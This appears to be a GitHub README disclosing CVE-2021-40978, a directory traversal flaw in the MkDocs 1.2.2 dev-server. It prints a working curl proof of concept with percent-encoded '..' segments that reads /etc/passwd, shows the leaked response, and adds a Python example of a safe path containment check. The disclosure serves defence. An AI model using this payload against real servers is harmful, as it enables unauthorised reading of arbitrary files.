nisdn/CVE-2021-40978

CVE-2021-40978

mkdocs built-in dev-server directory traversal exploitation

MkDocs 1.2.2 allows directory traversal through the built-in dev-server, which responds on port 8000. Some examples of successfully exploited paths are shown below:

Impact

Using this technique, it is possible to fetch files outside of the root directory, allowing anyone to read and download arbitrary files.

[Screenshots: impact, request, response]

Proof Of Concept

Nuclei Template: https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-40978.yaml

curl http://0.0.0.0:8000/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -i
HTTP/1.0 200 OK
Date: Mon, 04 Oct 2021 02:13:38 GMT
Server: WSGIServer/0.2 CPython/3.7.3
Content-Type: application/octet-stream
Content-Length: 2187

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync...
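
The containment check that rejects the request above, as an added example (not code from this repository or from MkDocs). It assumes a POSIX filesystem; `naive_resolve`, `safe_resolve`, `check_samples` and the `/srv/site` docroot are hypothetical names, and the sample requests other than the PoC path are constructed.

```python
import os
import tempfile
from urllib.parse import unquote

# Request path copied from the PoC on this page.
POC_PATH = "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"


def naive_resolve(docroot, url_path):
    """Unsafe pattern (illustrative): percent-decode, join, no containment check."""
    decoded = unquote(url_path)  # "%2e%2e" decodes to ".."
    return os.path.normpath(os.path.join(docroot, decoded.lstrip("/")))


def safe_resolve(docroot, url_path):
    """Return the real filesystem path if it stays under docroot, else None."""
    root = os.path.realpath(docroot)
    decoded = unquote(url_path)
    if "\x00" in decoded:
        return None
    # realpath collapses ".." and follows symlinks before the comparison.
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    # commonpath compares whole components, so a sibling such as "site-backup"
    # is not mistaken for "site" the way a startswith() prefix test would be.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def check_samples():
    """Run both resolvers over constructed requests in a throwaway docroot."""
    with tempfile.TemporaryDirectory() as tmp:
        docroot = os.path.join(tmp, "site")
        os.makedirs(os.path.join(docroot, "css"))
        os.makedirs(os.path.join(tmp, "site-backup"))
        return {
            "naive_poc": naive_resolve("/srv/site", POC_PATH),
            "safe_poc": safe_resolve(docroot, POC_PATH),
            "safe_sibling": safe_resolve(docroot, "/%2e%2e/site-backup/notes.txt"),
            "safe_ok": safe_resolve(docroot, "/css/site.css"),
            "expected_ok": os.path.join(os.path.realpath(docroot), "css", "site.css"),
        }


if __name__ == "__main__":
    for name, value in check_samples().items():
        print(f"{name}: {value}")
```

A handler that gets `None` back from `safe_resolve` should answer 404 rather than open the path.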
